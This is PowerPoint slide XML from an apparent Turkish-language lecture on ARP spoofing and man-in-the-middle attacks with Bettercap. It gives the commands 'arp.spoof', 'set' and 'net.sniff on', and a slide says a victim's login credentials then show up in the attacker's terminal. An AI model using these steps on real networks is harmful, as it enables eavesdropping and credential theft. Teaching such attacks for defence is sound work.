                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A86B48-6BDA-09A7-5925-923931B989A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486775" y="798284"/>
            <a:ext cx="3386138" cy="1077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05560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8982DAD6-644A-9521-834A-698096E8ACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12075887" cy="6705600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Sol Ok 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E405C10-A56E-8C6D-ACCC-5A0D8C96A584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5471886" y="4933001"/>
            <a:ext cx="1248228" cy="2177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Sol Ok 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{989C6CBE-4257-9BC4-F2FD-9341B394CB10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5581755" y="5819300"/>
            <a:ext cx="1248228" cy="2177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Sol Ok 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0756C572-DBD9-F105-1D4A-E9F51DD38841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965607" y="6487886"/>
            <a:ext cx="1248228" cy="2177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1DA4398F-5628-76CE-47D4-59998AE67BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="1657350"/>
            <a:ext cx="7729538" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arp.spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» parametresi ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> işleminin modülleri açılır. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ayarları için »set» parametresi kullanılır. İki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ataması yapılır. Hedef sistem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> adresi ve modülün 2 yönlü veri aktarımı.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Dikdörtgen 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED2F250-C0D6-FE5E-9581-5023C6C15B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3557588" y="1514475"/>
            <a:ext cx="7958137" cy="11572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024293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C2B87E7-CC70-AE9C-F031-C508EC74F1F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12079767" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Dikdörtgen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3144B073-DE42-C625-FD6C-FE4626D9F4B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638629" y="596942"/>
            <a:ext cx="8258628" cy="319315"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB1EFE56-3B94-7466-C454-9D5540E7B3AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638629" y="5018653"/>
            <a:ext cx="8354997" cy="361507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">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0810124C-7080-15C6-1098-C15C63C154B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638630" y="4458587"/>
            <a:ext cx="8411028" cy="361507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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B74702E8-482F-127F-E13E-B9A443C022E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3157537"/>
            <a:ext cx="5829300" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«arp –a» parametresi ile arp tablosu görüntülendiğinde hedef sistem ile saldırı makinasının Mac adreslerinin aynı olduğu gözlemlenir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3769081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1CFA396-89EE-4A50-B33E-C4489767D13C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="595086" y="696686"/>
            <a:ext cx="10203543" cy="5036457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Metin kutusu 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA81BC00-F980-CE4F-B7C7-2C48A298A4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595086" y="4905829"/>
            <a:ext cx="10877777" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>aldırganın birbiri ile doğrudan iletişim kuran iki taraf arasındaki iletişimi gizlice dinlediği veya değiştirdiği saldırı türüdür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BDC1C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Metin kutusu 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31BB55B-0641-4D5E-B632-BE0469A159EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4843462" y="809273"/>
            <a:ext cx="3800475" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ortadaki Adam Saldırısı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2839781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E7A1594A-0A01-AA1B-14C8-06D3ABECFD4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8004629" y="85060"/>
            <a:ext cx="4187371" cy="3577400"/>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4836E12D-A922-F146-3137-FAF2F7815F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="85060"/>
            <a:ext cx="8004629" cy="3577401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Dikdörtgen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFA8F78-A2B2-D628-2BA8-532E61B4E6BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="0"/>
            <a:ext cx="1378857" cy="2467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8" name="Düz Ok Bağlayıcısı 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD8B0A9-EFC0-724D-5C74-1CD96F47C3F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402419" y="329609"/>
            <a:ext cx="5103628" cy="261561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BD01ED53-3EED-06B9-2403-1148568A1DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8506047" y="3157870"/>
            <a:ext cx="2062716"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D70E7128-4CDA-563C-49B3-696100178049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3309257" y="3094074"/>
            <a:ext cx="5037301" cy="48909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Resim 13" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1086A1-0434-8A0F-01DD-59FA7341F11A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3662460"/>
            <a:ext cx="12192000" cy="3195540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="442944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A3E9825A-AA19-C7BD-116B-F0950B854EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8534400" cy="3976914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC00B191-36BD-D9E2-39A9-6A442FA06794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127906" y="3976914"/>
            <a:ext cx="12064093" cy="2881086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Düz Ok Bağlayıcısı 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C81F4FF4-BCA9-8479-4D4E-1CEC266A32BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1509486" y="5733143"/>
            <a:ext cx="0" cy="7402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34B09F26-ED58-6947-35D6-D4348D302425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026228" y="5733143"/>
            <a:ext cx="0" cy="7402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C37730CD-BAE0-7480-6B4A-0E971A636980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900988" y="157163"/>
            <a:ext cx="4143375" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Arp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> işlemin devamı olan bu saldırı türü de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracı ile gerçekleştirilir. Modüller ekranından «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» parametresi ile modüller açılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>net.sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> on» komutu ile ortadaki adam işlemi başlatılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Yan ekranda kullanıcımız bir sitenin giriş ekranından bilgilerini yazdığında bilgiler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracımızın terminaline düşecektir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3624882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ABFBBB3-3A7E-408A-90CB-E499E9CFD74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="325369"/>
            <a:ext cx="4368602" cy="1956841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
